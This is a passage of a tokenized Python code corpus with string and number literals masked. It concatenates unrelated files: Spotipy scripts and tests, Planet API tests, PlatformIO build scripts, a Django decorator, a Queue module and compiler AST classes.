y1 and r1 . x1 == r2 . x2 ) : <EOL> self . x = node . x <EOL> self . width += node . get_rect ( ) . width <EOL> ret = True <EOL> elif ( r1 . y1 == r2 . y1 and r1 . y2 == r2 . y1 and r1 . x2 == r2 . x1 ) : <EOL> self . width += node . get_rect ( ) . width <EOL> ret = True <EOL> return ret </s>
<s> import pprint <EOL> import sys <EOL> import spotipy <EOL> import spotipy . util as util <EOL> import simplejson as json <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> username = sys . argv [ <NUM_LIT:1> ] <EOL> else : <EOL> print ( "<STR_LIT>" % ( sys . argv [ <NUM_LIT:0> ] , ) ) <EOL> sys . exit ( ) <EOL> scope = '<STR_LIT>' <EOL> token = util . prompt_for_user_token ( username , scope ) <EOL> if token : <EOL> sp = spotipy . Spotify ( auth = token ) <EOL> sp . trace = False <EOL> ranges = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for range in ranges : <EOL> print "<STR_LIT>" , range <EOL> results = sp . current_user_top_tracks ( time_range = range , limit = <NUM_LIT:50> ) <EOL> for i , item in enumerate ( results [ '<STR_LIT>' ] ) : <EOL> print i , item [ '<STR_LIT:name>' ] , '<STR_LIT>' , item [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> print <EOL> else : <EOL> print ( "<STR_LIT>" , username ) </s>
<s> import spotipy <EOL> from spotipy import util <EOL> import unittest <EOL> import pprint <EOL> import sys <EOL> import simplejson as json <EOL> '''<STR_LIT>''' <EOL> class AuthTestSpotipy ( unittest . TestCase ) : <EOL> '''<STR_LIT>''' <EOL> playlist = "<STR_LIT>" <EOL> four_tracks = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> two_tracks = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> other_tracks = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> bad_id = '<STR_LIT>' <EOL> def test_track_bad_id ( self ) : <EOL> try : <EOL> track = spotify . track ( self . bad_id ) <EOL> self . assertTrue ( False ) <EOL> except spotipy . SpotifyException : <EOL> self . assertTrue ( True ) <EOL> def test_basic_user_profile ( self ) : <EOL> user = spotify . user ( username ) <EOL> self . assertTrue ( user [ '<STR_LIT:id>' ] == username ) <EOL> def test_current_user ( self ) : <EOL> user = spotify . current_user ( ) <EOL> self . assertTrue ( user [ '<STR_LIT:id>' ] == username ) <EOL> def test_me ( self ) : <EOL> user = spotify . me ( ) <EOL> self . assertTrue ( user [ '<STR_LIT:id>' ] == username ) <EOL> def test_user_playlists ( self ) : <EOL> playlists = spotify . user_playlists ( username , limit = <NUM_LIT:5> ) <EOL> self . assertTrue ( '<STR_LIT>' in playlists ) <EOL> self . assertTrue ( len ( playlists [ '<STR_LIT>' ] ) == <NUM_LIT:5> ) <EOL> def test_user_playlist_tracks ( self ) : <EOL> playlists = spotify . user_playlists ( username , limit = <NUM_LIT:5> ) <EOL> self . assertTrue ( '<STR_LIT>' in playlists ) <EOL> for playlist in playlists [ '<STR_LIT>' ] : <EOL> user = playlist [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> pid = playlist [ '<STR_LIT:id>' ] <EOL> results = spotify . user_playlist_tracks ( user , pid ) <EOL> self . 
assertTrue ( len ( results [ '<STR_LIT>' ] ) >= <NUM_LIT:0> ) <EOL> def user_playlist_tracks ( self , user , playlist_id = None , fields = None , <EOL> limit = <NUM_LIT:100> , offset = <NUM_LIT:0> ) : <EOL> self . assertTrue ( len ( playlists [ '<STR_LIT>' ] ) == <NUM_LIT:5> ) <EOL> def test_current_user_saved_tracks ( self ) : <EOL> tracks = spotify . current_user_saved_tracks ( ) <EOL> self . assertTrue ( len ( tracks [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_current_user_saved_albums ( self ) : <EOL> albums = spotify . current_user_saved_albums ( ) <EOL> self . assertTrue ( len ( albums [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_current_user_save_and_unsave_tracks ( self ) : <EOL> tracks = spotify . current_user_saved_tracks ( ) <EOL> total = tracks [ '<STR_LIT>' ] <EOL> spotify . current_user_saved_tracks_add ( self . four_tracks ) <EOL> tracks = spotify . current_user_saved_tracks ( ) <EOL> new_total = tracks [ '<STR_LIT>' ] <EOL> self . assertTrue ( new_total - total == len ( self . four_tracks ) ) <EOL> tracks = spotify . current_user_saved_tracks_delete ( self . four_tracks ) <EOL> tracks = spotify . current_user_saved_tracks ( ) <EOL> new_total = tracks [ '<STR_LIT>' ] <EOL> self . assertTrue ( new_total == total ) <EOL> def test_categories ( self ) : <EOL> response = spotify . categories ( ) <EOL> self . assertTrue ( len ( response [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_category_playlists ( self ) : <EOL> response = spotify . categories ( ) <EOL> for cat in response [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> cat_id = cat [ '<STR_LIT:id>' ] <EOL> response = spotify . category_playlists ( category_id = cat_id ) <EOL> self . assertTrue ( len ( response [ '<STR_LIT>' ] [ "<STR_LIT>" ] ) > <NUM_LIT:0> ) <EOL> def test_new_releases ( self ) : <EOL> response = spotify . new_releases ( ) <EOL> self . assertTrue ( len ( response [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_featured_releases ( self ) : <EOL> response = spotify . 
featured_playlists ( ) <EOL> self . assertTrue ( len ( response [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_current_user_follows ( self ) : <EOL> response = spotify . current_user_followed_artists ( ) <EOL> artists = response [ '<STR_LIT>' ] <EOL> self . assertTrue ( len ( artists [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_current_user_top_tracks ( self ) : <EOL> response = spotify . current_user_top_tracks ( ) <EOL> items = response [ '<STR_LIT>' ] <EOL> self . assertTrue ( len ( items ) > <NUM_LIT:0> ) <EOL> def test_current_user_top_artists ( self ) : <EOL> response = spotify . current_user_top_artists ( ) <EOL> items = response [ '<STR_LIT>' ] <EOL> self . assertTrue ( len ( items ) > <NUM_LIT:0> ) <EOL> def get_or_create_spotify_playlist ( self , username , playlist_name ) : <EOL> playlists = spotify . user_playlists ( username ) <EOL> while playlists : <EOL> for item in playlists [ '<STR_LIT>' ] : <EOL> if item [ '<STR_LIT:name>' ] == playlist_name : <EOL> return item [ '<STR_LIT:id>' ] <EOL> playlists = spotify . next ( playlists ) <EOL> playlist = spotify . user_playlist_create ( username , playlist_name ) <EOL> playlist_id = playlist [ '<STR_LIT>' ] <EOL> return playlist_id <EOL> def test_user_playlist_ops ( self ) : <EOL> playlist_id = self . get_or_create_spotify_playlist ( username , <EOL> '<STR_LIT>' ) <EOL> spotify . user_playlist_replace_tracks ( username , playlist_id , [ ] ) <EOL> playlist = spotify . user_playlist ( username , playlist_id ) <EOL> self . assertTrue ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) <EOL> self . assertTrue ( len ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:0> ) <EOL> spotify . user_playlist_add_tracks ( username , playlist_id , self . four_tracks ) <EOL> playlist = spotify . user_playlist ( username , playlist_id ) <EOL> self . assertTrue ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:4> ) <EOL> self . 
assertTrue ( len ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:4> ) <EOL> spotify . user_playlist_remove_all_occurrences_of_tracks ( username , <EOL> playlist_id , self . two_tracks ) <EOL> playlist = spotify . user_playlist ( username , playlist_id ) <EOL> self . assertTrue ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:2> ) <EOL> self . assertTrue ( len ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:2> ) <EOL> spotify . user_playlist_replace_tracks ( username , <EOL> playlist_id , self . other_tracks ) <EOL> playlist = spotify . user_playlist ( username , playlist_id ) <EOL> self . assertTrue ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:3> ) <EOL> self . assertTrue ( len ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:3> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> username = sys . argv [ <NUM_LIT:1> ] <EOL> del sys . argv [ <NUM_LIT:1> ] <EOL> scope = '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> token = util . prompt_for_user_token ( username , scope ) <EOL> spotify = spotipy . Spotify ( auth = token ) <EOL> spotify . trace = False <EOL> unittest . main ( ) <EOL> else : <EOL> print ( "<STR_LIT>" % ( sys . argv [ <NUM_LIT:0> ] , ) ) </s>
<s> import json <EOL> from planet . api import utils <EOL> from _common import read_fixture <EOL> def test_geometry_from_json ( ) : <EOL> assert None is utils . geometry_from_json ( { } ) <EOL> collection = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : [ ] } <EOL> assert None is utils . geometry_from_json ( collection ) <EOL> geom = { '<STR_LIT:type>' : '<STR_LIT>' } <EOL> assert geom == utils . geometry_from_json ( geom ) <EOL> feature = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : geom } <EOL> assert geom == utils . geometry_from_json ( feature ) <EOL> collection = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : [ feature ] } <EOL> assert geom == utils . geometry_from_json ( collection ) <EOL> def test_build_conditions ( ) : <EOL> workspace = json . loads ( read_fixture ( '<STR_LIT>' ) ) <EOL> c = utils . build_conditions ( workspace ) <EOL> assert c [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT:10> <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT> <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT:200> <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT> <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT> <EOL> def test_probably_wkt ( ) : <EOL> assert not utils . probably_wkt ( '<STR_LIT>' ) <EOL> assert not utils . probably_wkt ( '<STR_LIT>' ) <EOL> assert not utils . probably_wkt ( '<STR_LIT>' ) <EOL> assert not utils . probably_wkt ( '<STR_LIT>' ) <EOL> wkt = read_fixture ( '<STR_LIT>' ) . split ( '<STR_LIT:\n>' ) <EOL> assert len ( wkt ) > <NUM_LIT:0> <EOL> for valid in wkt : <EOL> assert utils . probably_wkt ( valid ) <EOL> def test_probably_geojson ( ) : <EOL> assert utils . probably_geojson ( '<STR_LIT>' ) is None <EOL> assert utils . probably_geojson ( '<STR_LIT:{}>' ) is None <EOL> assert utils . probably_geojson ( { } ) is None <EOL> assert utils . probably_geojson ( { '<STR_LIT:type>' : '<STR_LIT>' } ) is None <EOL> assert utils . probably_geojson ( { '<STR_LIT:type>' : '<STR_LIT>' } ) == { '<STR_LIT:type>' : '<STR_LIT>' } <EOL> assert utils . 
probably_geojson ( '<STR_LIT>' ) == { '<STR_LIT:type>' : '<STR_LIT>' } </s>
<s> """<STR_LIT>""" <EOL> from os . path import basename , join <EOL> from SCons . Script import ( COMMAND_LINE_TARGETS , AlwaysBuild , Default , <EOL> DefaultEnvironment , SConscript ) <EOL> from platformio . util import get_serialports <EOL> def BeforeUpload ( target , source , env ) : <EOL> env . AutodetectUploadPort ( ) <EOL> board_type = env . subst ( "<STR_LIT>" ) <EOL> if "<STR_LIT>" not in board_type : <EOL> env . Append ( <EOL> UPLOADERFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:true>" if ( "<STR_LIT>" in board_type . lower ( <EOL> ) or board_type == "<STR_LIT>" ) else "<STR_LIT:false>" <EOL> ] ) <EOL> upload_options = env . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , { } ) <EOL> if not upload_options . get ( "<STR_LIT>" , False ) : <EOL> env . FlushSerialBuffer ( "<STR_LIT>" ) <EOL> before_ports = [ i [ '<STR_LIT:port>' ] for i in get_serialports ( ) ] <EOL> if upload_options . get ( "<STR_LIT>" , False ) : <EOL> env . TouchSerialPort ( "<STR_LIT>" , <NUM_LIT> ) <EOL> if upload_options . get ( "<STR_LIT>" , False ) : <EOL> env . Replace ( UPLOAD_PORT = env . WaitForNewSerialPort ( before_ports ) ) <EOL> if "<STR_LIT:/>" in env . subst ( "<STR_LIT>" ) : <EOL> env . Replace ( UPLOAD_PORT = basename ( env . subst ( "<STR_LIT>" ) ) ) <EOL> env = DefaultEnvironment ( ) <EOL> SConscript ( env . subst ( join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) ) <EOL> if env . subst ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> env . 
Replace ( <EOL> UPLOADER = join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> UPLOADERFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> join ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" , <EOL> join ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) , <EOL> "<STR_LIT:-c>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> ] , <EOL> UPLOADCMD = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> env . Replace ( <EOL> UPLOADER = join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> UPLOADERFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> UPLOADCMD = '<STR_LIT>' <EOL> ) <EOL> env . Append ( <EOL> CCFLAGS = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> CFLAGS = [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> CXXFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> CPPDEFINES = [ <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' <EOL> ] , <EOL> LINKFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> ) <EOL> if "<STR_LIT>" in env . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , None ) : <EOL> env . Append ( <EOL> CPPDEFINES = [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> LINKFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> UPLOADERFLAGS = [ <EOL> "<STR_LIT>" , <EOL> ] <EOL> ) <EOL> elif "<STR_LIT>" in env . subst ( "<STR_LIT>" ) : <EOL> env . Append ( <EOL> LINKFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> ) <EOL> target_elf = env . BuildProgram ( ) <EOL> if "<STR_LIT>" in COMMAND_LINE_TARGETS : <EOL> target_firm = join ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> target_firm = env . 
ElfToBin ( join ( "<STR_LIT>" , "<STR_LIT>" ) , target_elf ) <EOL> target_size = env . Alias ( "<STR_LIT:size>" , target_elf , "<STR_LIT>" ) <EOL> AlwaysBuild ( target_size ) <EOL> if env . subst ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> upload = env . Alias ( [ "<STR_LIT>" , "<STR_LIT>" ] , target_firm , "<STR_LIT>" ) <EOL> else : <EOL> upload = env . Alias ( [ "<STR_LIT>" , "<STR_LIT>" ] , target_firm , <EOL> [ BeforeUpload , "<STR_LIT>" ] ) <EOL> AlwaysBuild ( upload ) <EOL> Default ( [ target_firm , target_size ] ) </s>
<s> from hashlib import md5 <EOL> from os . path import join <EOL> from tempfile import gettempdir <EOL> MAX_SOURCES_LENGTH = <NUM_LIT> <EOL> def _huge_sources_hook ( sources ) : <EOL> _sources = str ( sources ) . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) <EOL> if len ( str ( _sources ) ) < MAX_SOURCES_LENGTH : <EOL> return sources <EOL> tmp_file = join ( gettempdir ( ) , "<STR_LIT>" % md5 ( _sources ) . hexdigest ( ) ) <EOL> with open ( tmp_file , "<STR_LIT:w>" ) as f : <EOL> for line in _sources . split ( "<STR_LIT>" ) : <EOL> if not line . endswith ( "<STR_LIT>" ) : <EOL> line += "<STR_LIT>" <EOL> f . write ( '<STR_LIT>' % line ) <EOL> return '<STR_LIT>' % tmp_file <EOL> def exists ( _ ) : <EOL> return True <EOL> def generate ( env ) : <EOL> env . Replace ( <EOL> _huge_sources_hook = _huge_sources_hook , <EOL> ARCOM = env . get ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( <EOL> "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> return env </s>
<s> from platformio . platforms . base import BasePlatform <EOL> from platformio . util import get_systype <EOL> class Linux_i686Platform ( BasePlatform ) : <EOL> """<STR_LIT>""" <EOL> PACKAGES = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:default>" : True <EOL> } <EOL> } <EOL> def __init__ ( self ) : <EOL> if get_systype ( ) == "<STR_LIT>" : <EOL> del self . PACKAGES [ '<STR_LIT>' ] <EOL> BasePlatform . __init__ ( self ) </s>
<s> import functools <EOL> from django . conf import settings <EOL> from django . http import HttpResponseForbidden <EOL> def debug_required ( fn ) : <EOL> @ functools . wraps ( fn ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> if not getattr ( settings , '<STR_LIT>' , settings . DEBUG ) : <EOL> return HttpResponseForbidden ( ) <EOL> return fn ( * args , ** kwargs ) <EOL> return wrapper </s>
<s> """<STR_LIT>""" <EOL> from time import time as _time <EOL> from collections import deque <EOL> import heapq <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Empty ( Exception ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> class Full ( Exception ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> class Queue : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , maxsize = <NUM_LIT:0> ) : <EOL> try : <EOL> import threading <EOL> except ImportError : <EOL> import dummy_threading as threading <EOL> self . maxsize = maxsize <EOL> self . _init ( maxsize ) <EOL> self . mutex = threading . Lock ( ) <EOL> self . not_empty = threading . Condition ( self . mutex ) <EOL> self . not_full = threading . Condition ( self . mutex ) <EOL> self . all_tasks_done = threading . Condition ( self . mutex ) <EOL> self . unfinished_tasks = <NUM_LIT:0> <EOL> def task_done ( self ) : <EOL> """<STR_LIT>""" <EOL> self . all_tasks_done . acquire ( ) <EOL> try : <EOL> unfinished = self . unfinished_tasks - <NUM_LIT:1> <EOL> if unfinished <= <NUM_LIT:0> : <EOL> if unfinished < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . all_tasks_done . notify_all ( ) <EOL> self . unfinished_tasks = unfinished <EOL> finally : <EOL> self . all_tasks_done . release ( ) <EOL> def join ( self ) : <EOL> """<STR_LIT>""" <EOL> self . all_tasks_done . acquire ( ) <EOL> try : <EOL> while self . unfinished_tasks : <EOL> self . all_tasks_done . wait ( ) <EOL> finally : <EOL> self . all_tasks_done . release ( ) <EOL> def qsize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mutex . acquire ( ) <EOL> n = self . _qsize ( ) <EOL> self . mutex . release ( ) <EOL> return n <EOL> def empty ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mutex . acquire ( ) <EOL> n = not self . _qsize ( ) <EOL> self . mutex . release ( ) <EOL> return n <EOL> def full ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mutex . acquire ( ) <EOL> n = <NUM_LIT:0> < self . maxsize == self . 
_qsize ( ) <EOL> self . mutex . release ( ) <EOL> return n <EOL> def put ( self , item , block = True , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> self . not_full . acquire ( ) <EOL> try : <EOL> if self . maxsize > <NUM_LIT:0> : <EOL> if not block : <EOL> if self . _qsize ( ) == self . maxsize : <EOL> raise Full <EOL> elif timeout is None : <EOL> while self . _qsize ( ) == self . maxsize : <EOL> self . not_full . wait ( ) <EOL> elif timeout < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> endtime = _time ( ) + timeout <EOL> while self . _qsize ( ) == self . maxsize : <EOL> remaining = endtime - _time ( ) <EOL> if remaining <= <NUM_LIT:0.0> : <EOL> raise Full <EOL> self . not_full . wait ( remaining ) <EOL> self . _put ( item ) <EOL> self . unfinished_tasks += <NUM_LIT:1> <EOL> self . not_empty . notify ( ) <EOL> finally : <EOL> self . not_full . release ( ) <EOL> def put_nowait ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return self . put ( item , False ) <EOL> def get ( self , block = True , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> self . not_empty . acquire ( ) <EOL> try : <EOL> if not block : <EOL> if not self . _qsize ( ) : <EOL> raise Empty <EOL> elif timeout is None : <EOL> while not self . _qsize ( ) : <EOL> self . not_empty . wait ( ) <EOL> elif timeout < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> endtime = _time ( ) + timeout <EOL> while not self . _qsize ( ) : <EOL> remaining = endtime - _time ( ) <EOL> if remaining <= <NUM_LIT:0.0> : <EOL> raise Empty <EOL> self . not_empty . wait ( remaining ) <EOL> item = self . _get ( ) <EOL> self . not_full . notify ( ) <EOL> return item <EOL> finally : <EOL> self . not_empty . release ( ) <EOL> def get_nowait ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . get ( False ) <EOL> def _init ( self , maxsize ) : <EOL> self . queue = deque ( ) <EOL> def _qsize ( self , len = len ) : <EOL> return len ( self . 
queue ) <EOL> def _put ( self , item ) : <EOL> self . queue . append ( item ) <EOL> def _get ( self ) : <EOL> return self . queue . popleft ( ) <EOL> class PriorityQueue ( Queue ) : <EOL> '''<STR_LIT>''' <EOL> def _init ( self , maxsize ) : <EOL> self . queue = [ ] <EOL> def _qsize ( self , len = len ) : <EOL> return len ( self . queue ) <EOL> def _put ( self , item , heappush = heapq . heappush ) : <EOL> heappush ( self . queue , item ) <EOL> def _get ( self , heappop = heapq . heappop ) : <EOL> return heappop ( self . queue ) <EOL> class LifoQueue ( Queue ) : <EOL> '''<STR_LIT>''' <EOL> def _init ( self , maxsize ) : <EOL> self . queue = [ ] <EOL> def _qsize ( self , len = len ) : <EOL> return len ( self . queue ) <EOL> def _put ( self , item ) : <EOL> self . queue . append ( item ) <EOL> def _get ( self ) : <EOL> return self . queue . pop ( ) </s>
<s> """<STR_LIT>""" <EOL> from compiler . consts import CO_VARARGS , CO_VARKEYWORDS <EOL> def flatten ( seq ) : <EOL> l = [ ] <EOL> for elt in seq : <EOL> t = type ( elt ) <EOL> if t is tuple or t is list : <EOL> for elt2 in flatten ( elt ) : <EOL> l . append ( elt2 ) <EOL> else : <EOL> l . append ( elt ) <EOL> return l <EOL> def flatten_nodes ( seq ) : <EOL> return [ n for n in flatten ( seq ) if isinstance ( n , Node ) ] <EOL> nodes = { } <EOL> class Node : <EOL> """<STR_LIT>""" <EOL> def getChildren ( self ) : <EOL> pass <EOL> def __iter__ ( self ) : <EOL> for n in self . getChildren ( ) : <EOL> yield n <EOL> def asList ( self ) : <EOL> return self . getChildren ( ) <EOL> def getChildNodes ( self ) : <EOL> pass <EOL> class EmptyNode ( Node ) : <EOL> pass <EOL> class Expression ( Node ) : <EOL> nodes [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> def __init__ ( self , node ) : <EOL> self . node = node <EOL> def getChildren ( self ) : <EOL> return self . node , <EOL> def getChildNodes ( self ) : <EOL> return self . node , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . node ) ) <EOL> class Add ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class And ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . 
nodes ) , ) <EOL> class AssAttr ( Node ) : <EOL> def __init__ ( self , expr , attrname , flags , lineno = None ) : <EOL> self . expr = expr <EOL> self . attrname = attrname <EOL> self . flags = flags <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , self . attrname , self . flags <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . attrname ) , repr ( self . flags ) ) <EOL> class AssList ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class AssName ( Node ) : <EOL> def __init__ ( self , name , flags , lineno = None ) : <EOL> self . name = name <EOL> self . flags = flags <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . name , self . flags <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . name ) , repr ( self . flags ) ) <EOL> class AssTuple ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Assert ( Node ) : <EOL> def __init__ ( self , test , fail , lineno = None ) : <EOL> self . test = test <EOL> self . fail = fail <EOL> self . 
lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . test ) <EOL> children . append ( self . fail ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . test ) <EOL> if self . fail is not None : <EOL> nodelist . append ( self . fail ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , repr ( self . fail ) ) <EOL> class Assign ( Node ) : <EOL> def __init__ ( self , nodes , expr , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . extend ( flatten ( self . nodes ) ) <EOL> children . append ( self . expr ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> nodelist . append ( self . expr ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , repr ( self . expr ) ) <EOL> class AugAssign ( Node ) : <EOL> def __init__ ( self , node , op , expr , lineno = None ) : <EOL> self . node = node <EOL> self . op = op <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . node , self . op , self . expr <EOL> def getChildNodes ( self ) : <EOL> return self . node , self . expr <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . node ) , repr ( self . op ) , repr ( self . expr ) ) <EOL> class Backquote ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . 
